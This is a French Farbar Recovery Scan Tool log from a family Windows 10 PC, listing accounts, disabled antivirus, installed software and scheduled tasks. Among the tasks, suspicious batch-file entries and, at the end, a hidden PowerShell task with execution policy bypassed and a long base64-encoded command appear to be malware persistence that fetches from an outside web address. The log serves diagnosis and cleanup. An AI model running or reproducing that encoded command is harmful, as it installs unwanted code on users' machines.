Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version:07-02-2016 Exécuté par Famille (2016-02-09 13:49:32) Exécuté depuis C:\Users\Famille\Downloads Windows 10 Home (X64) (2015-12-27 04:59:08) Mode d'amorçage: Normal ========================================================== ==================== Comptes: ============================= Administrateur (S-1-5-21-3859349222-1854191734-3556633951-500 - Administrator - Disabled) => C:\Users\Administrateur.LeFLOCH DefaultAccount (S-1-5-21-3859349222-1854191734-3556633951-503 - Limited - Disabled) Famille (S-1-5-21-3859349222-1854191734-3556633951-1001 - Administrator - Enabled) => C:\Users\Famille Invité (S-1-5-21-3859349222-1854191734-3556633951-501 - Limited - Disabled) ==================== Centre de sécurité ======================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736} ==================== Programmes installés ====================== (Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.) µTorrent (HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\uTorrent) (Version: 3.4.4.40911 - BitTorrent Inc.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 20.0.0.233 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated) Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.) AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden Algobox (HKLM-x32\...\Algobox) (Version: - ) Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD) AMD Catalyst Install Manager (HKLM\...\{204EABB7-88FC-9AF7-CA3D-7B40C37EA4ED}) (Version: 8.0.915.0 - Advanced Micro Devices, Inc.) Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) Assistance Livebox (HKLM-x32\...\Assistance Livebox) (Version: 1.2.5.0 - Orange) Avast Free Antivirus (HKLM-x32\...\avast) (Version: 10.2.2218 - AVAST Software) Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Build-a-lot (x32 Version: 2.2.0.98 - WildTangent) Hidden CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.4.1.3099 - CDBurnerXP) Configuration DivX (HKLM-x32\...\DivX Setup) (Version: 2.6.1.8 - DivX, LLC) Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden Crazy Chicken Soccer (x32 Version: 2.2.0.110 - WildTangent) Hidden Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company) Enjoy 6e (HKLM-x32\...\Enjoy 6e) (Version: 0.9.00 - Editions Didier) Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited) Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden Farming Simulator 15 (HKLM-x32\...\Steam App 313160) (Version: - Giants Software) Farming Simulator 2013 (HKLM-x32\...\FarmingSimulator2013INT_is1) (Version: 1.0 - GIANTS Software) Fax (x32 Version: 140.0.307.000 - Hewlett-Packard) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.103 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.110 - WildTangent) Hidden GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: 1.0 - Meridian Audio Ltd) HP Connected Music (Meridian - player) (HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\HPConnectedMusic) (Version: 1.1 (build 96) hp - Meridian Audio Ltd) HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Photosmart All-In-One Driver Software (HKLM\...\{A96C5DB7-40F9-46DD-B36F-9E657D1D9E04}) (Version: 14.0 - HP) HP Photosmart Essential (HKLM-x32\...\{6994491D-D491-48F1-AE1F-E179C1FFFC2F}) (Version: 1.9.1.2 - HP) HP Quick Start (HKLM-x32\...\{574F0207-8E98-46CD-8F79-318348C98C46}) (Version: 1.0.4660.30220 - Hewlett-Packard) HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.6263.4289 - Hewlett-Packard) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.1.40.3 - Hewlett-Packard Company) HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 12.00.0000 - Hewlett-Packard) HP Support Solutions Framework (HKLM-x32\...\{E4B931AF-C59A-4D92-8767-8E2D5F53144E}) (Version: 12.0.30.219 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden HPSSupply (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden iFunbox (v2.94.2520.758), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.94.2520.758 - ) iTunes (HKLM\...\{77DE5105-D05E-448C-96CB-7FA381903753}) (Version: 11.3.1.2 - Apple Inc.) IZArc 4.1.6 (HKLM-x32\...\{97C82B44-D408-4F14-9252-47FC1636D23E}_is1) (Version: 4.1.6 - Ivan Zahariev) Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation) Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games) League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden Ma-Config.com (64 bits) (HKLM\...\{EA05AB38-4729-427E-9859-84933E278B51}) (Version: 7.1.1.0 - Cybelsoft) Mahjongg Artifacts (x32 Version: 2.2.0.110 - WildTangent) Hidden MarketResearch (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Mise à jour Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-040C-0000-0000000FF1CE}_ENTERPRISE_{B761869A-B85C-40E2-994C-A1CE78AC8F2C}) (Version: - Microsoft) Mise à jour Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-040C-0000-0000000FF1CE}_ENTERPRISE_{51EFB347-1F3D-4BAC-8B79-F056B904FE21}) (Version: - Microsoft) Mise à jour Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-040C-0000-0000000FF1CE}_ENTERPRISE_{C3DCA38E-005E-41BA-A52A-7C3429F351C3}) (Version: - Microsoft) Mise à jour Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-040C-0000-0000000FF1CE}_ENTERPRISE_{81536A04-DBFB-4DB3-978F-0F284590C223}) (Version: - Microsoft) Mozilla Firefox 31.0 (x86 fr) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 fr)) (Version: 31.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla) Network64 (Version: 140.0.306.000 - Hewlett-Packard) Hidden OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) OpenOffice.org 3.4.1 (HKLM-x32\...\{7DA1C06F-C913-46C7-8A0F-DA2CBA17EA1D}) (Version: 3.41.9593 - Apache Software Foundation) Orange Inside (HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\Orange Inside) (Version: V1.3.0.0 - Orange) Orange Installer (HKLM-x32\...\Orange Installer) (Version: 2.0.0.4 - Orange) Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden PS_AIO_02_Software (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden PS_AIO_02_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden Ranch Rush 2 - Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.) Recovery Manager (x32 Version: 5.5.0.6208 - CyberLink Corp.) Hidden Royal Envoy 2 Collector's Edition (x32 Version: 3.0.2.32 - WildTangent) Hidden Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15041.2 - Samsung Electronics Co., Ltd.) Samsung Kies3 (x32 Version: 3.2.15041.2 - Samsung Electronics Co., Ltd.) Hidden Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP) Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation) SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden Songr (HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\Songr) (Version: 2.0.2270 - Xamasoft) Songr Packages (HKU\S-1-5-21-3859349222-1854191734-3556633951-1001\...\Songr Packages) (Version: - ) <==== ATTENTION Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.3.2 - Krzysztof Kowalczyk) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH) TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.47484 - TeamViewer) Thrustmaster Force Feedback Driver (HKLM-x32\...\{8F5A0981-5CDC-41D0-BCA2-AD3B777FC358}) (Version: 2.FFD.2009 - Thrustmaster) TI Connect™ (HKLM-x32\...\{D06BA64C-4447-49B4-B99D-E85BEA9E1035}) (Version: 4.0.0.218 - Texas Instruments Inc.) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Trinklit Supreme (x32 Version: 2.2.0.98 - WildTangent) Hidden Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Vacation Quest™ - Australia (x32 Version: 3.0.2.32 - WildTangent) Hidden VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden Virtual Families (x32 Version: 2.2.0.98 - WildTangent) Hidden VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN) WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden Wedding Dash (x32 Version: 2.2.0.95 - WildTangent) Hidden WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent) WildTangent Games App (HP Games) (x32 Version: 4.0.10.5 - WildTangent) Hidden Windows Driver Package - Texas Instruments Inc. (SilvrLnk) USB (06/11/2009 1.0.0.0) (HKLM\...\EC3E466026556D3EB760B01C4772277614354E11) (Version: 06/11/2009 1.0.0.0 - Texas Instruments Inc.) Windows Driver Package - Texas Instruments Inc. (TIEHDUSB) USB (09/02/2009 1.0.0.1) (HKLM\...\7511B29C86C398B4D11A0B0E4176CAD68D1B7057) (Version: 09/02/2009 1.0.0.1 - Texas Instruments Inc.) WinPcap 4.1.2 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2001 - CACE Technologies) WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) Youda Jewel Shop (x32 Version: 3.0.2.32 - WildTangent) Hidden Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden ==================== Personnalisé CLSID (Avec liste blanche): ========================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) CustomCLSID: HKU\S-1-5-21-3859349222-1854191734-3556633951-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Famille\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation) ==================== Tâches planifiées (Avec liste blanche) ============= (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {0CAD28C0-3E31-4925-97F1-C4270755CFAC} - System32\Tasks\Lakciud => C:\PROGRA~1\SHOPPE~1\Nasutiof.bat Task: {0DC7E7AC-1231-4142-A173-C59972A8C7E4} - System32\Tasks\{65F966AC-64E6-43AE-B46C-DFE598736477} => pcalua.exe -a C:\windows\SysWOW64\Macromed\Flash\FlashUtil32_12_0_0_70_Plugin.exe -c -maintain plugin Task: {0FCE9358-0DA7-4398-98DD-1FBEBC13C0D9} - System32\Tasks\{143426BB-196A-45E1-959E-AD4F870E72BA} => pcalua.exe -a "C:\Users\Famille\AppData\Roaming\0D0S1L2Z1P1B0T1P1B2Z\Codec Pack Packages\uninstaller.exe" -c /Uninstall /NM="Codec Pack Packages" /AN="0D0S1L2Z1P1B0T1P1B2Z" /MBN="Codec Pack Packages" Task: {2193547A-013C-456F-8AF2-422169536B1E} - System32\Tasks\HPCeeScheduleForFamille => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard) Task: {3C2E5666-C04D-4EE3-BE95-B7B74714FA38} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION Task: {4D051EE6-0B9A-4E19-8C61-037643EB096A} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION Task: {4D11634C-1CFF-478D-8A7C-E5143968BE48} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-3859349222-1854191734-3556633951-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe Task: {57250EA1-EECE-4C82-AC90-DD471AF2AF93} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-3859349222-1854191734-3556633951-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe Task: {599EFFCC-DE07-44CE-AAD7-FD2950DDADD3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION Task: {5AC79E81-5266-4BF9-B62A-CB1D6CBA4405} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION Task: {5BDD8C6C-6BFE-4AD1-858F-EB9BC1AD7CFC} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION Task: {60EBEE55-B2BF-4A29-9E97-3125574E81DE} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION Task: {677541B2-9EF3-4428-9A31-DEB5ACAAF8C5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION Task: {68218412-D2D1-43D1-96F7-ED2630564354} - System32\Tasks\{C591C80C-EA06-491D-BADA-E125D96D8F5C} => pcalua.exe -a "C:\Users\Famille\AppData\Roaming\0V1L2Z2Z1T1I1L1T\Windows Movie Maker Packages\uninstaller.exe" -c /Uninstall /NM="Windows Movie Maker Packages" /AN="0V1L2Z2Z1T1I1L1T" /MBN="Windows Movie Maker Packages" Task: {7748365F-1D85-48C9-9132-2FA4569866BE} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION Task: {787EE980-B090-4614-B170-3F23857B4336} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-3859349222-1854191734-3556633951-1001UA => C:\Users\Famille\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-11-15] (Facebook Inc.) Task: {7AF0503A-D166-462E-8EB2-18148324CA5B} - System32\Tasks\Microsoft\Windows\orangeinside => C:\Users\Famille\AppData\Roaming\Orange\OrangeInside\one\OrangeInside.exe [2012-11-22] (Orange) Task: {7E850844-6621-4518-80D7-54E98D640B65} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {81DF9CBD-1615-489C-8A61-F8C380D59796} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-19] (Adobe Systems Incorporated) Task: {8FAD9082-41B2-412D-A144-EAB14345DEF7} - \CCleanerSkipUAC -> Pas de fichier <==== ATTENTION Task: {93DCB178-8D7D-4294-B13A-F222F0297DFB} - System32\Tasks\Microsoft\Windows\orangeinstaller => C:\Program Files (x86)\Orange\Orange Installer\OrangeInstaller.exe [2012-11-27] () Task: {95380821-56FC-410E-A939-33CD90649F66} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-28] (Hewlett-Packard) Task: {A7271269-6DAE-4F0F-9AD2-F645BE99A95C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-13] (Microsoft Corporation) Task: {AA0B9AF9-9208-4FD7-9AD3-1FB63312786E} - System32\Tasks\AssistanceLivebox => C:\Program Files (x86)\Orange\Assistance Livebox\AssistanceLivebox.exe [2012-11-15] (Orange) Task: {B2FDEE76-BC6C-45E9-93F5-DB194B953B8D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company) Task: {B90AD6E1-EB63-420A-BE2B-5E4B38740E59} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-3859349222-1854191734-3556633951-1001Core => C:\Users\Famille\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-11-15] (Facebook Inc.) Task: {BB73EECC-E716-417F-B821-0230173FF439} - System32\Tasks\{4810692A-BD34-4634-AD0F-9F983B141AD9} => pcalua.exe -a "C:\Program Files (x86)\COCTimer\Uninstall.exe" Task: {BCA2048B-999A-472D-8A19-27981FCF2910} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.) Task: {BFDA983C-02A9-4EF0-88A3-B566AE3F48FA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION Task: {C2CDBC28-44BE-4C6B-B988-D1A7789204B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {CA5E75C1-1E43-4B57-BF0D-27C68007F0EB} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION Task: {D3091F0C-D681-463E-99DC-60D0CAF9C10D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company) Task: {EA82B5B0-6E58-4238-870D-A949E09DF866} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {F17642D0-8CFD-447B-8C0E-D66C0468E4CB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard) Task: {F3DD816E-83A8-43EF-B60D-9042DFF55B65} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION Task: {F4CBE2F1-0BCD-4B58-AC65-33BD234F44C1} - System32\Tasks\Netriu => C:\PROGRA~1\SHOPPE~2\Mhdapdei.bat Task: {FD8C4D71-F6AD-4E75-9DF1-4C428943251C} - System32\Tasks\{7D0D0C47-097D-0A7F-0C11-0A057F051105} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAbQBhAHIAdABkAG8AbgBlAC4AaQBuAGYAbwAvAHUALwA/AGEAPQBuADYAXwBPAHYARQBfAF8AZQBrAGUAdgBpAEgANAB1AHMAWgBXAHEASQBMAHcAWgBYAHIAYgAwAGMAOQBnAFIAYQBYADgAcQA3ADAATQBYAHoAdgBjAG0ANgBaAHcAQgBGAE4ANABJAGMAdQBoAE8AYwBHAEgAUwBQAGIAWQBFADgAUQBhAE8AaABTAFEANwBaAC0AMABOAGIAdwBSADQAWAAxADAATQAxAEcAegBJAFgAQQBtADIAZABfAE0AQwBoAE8AVwBnADkA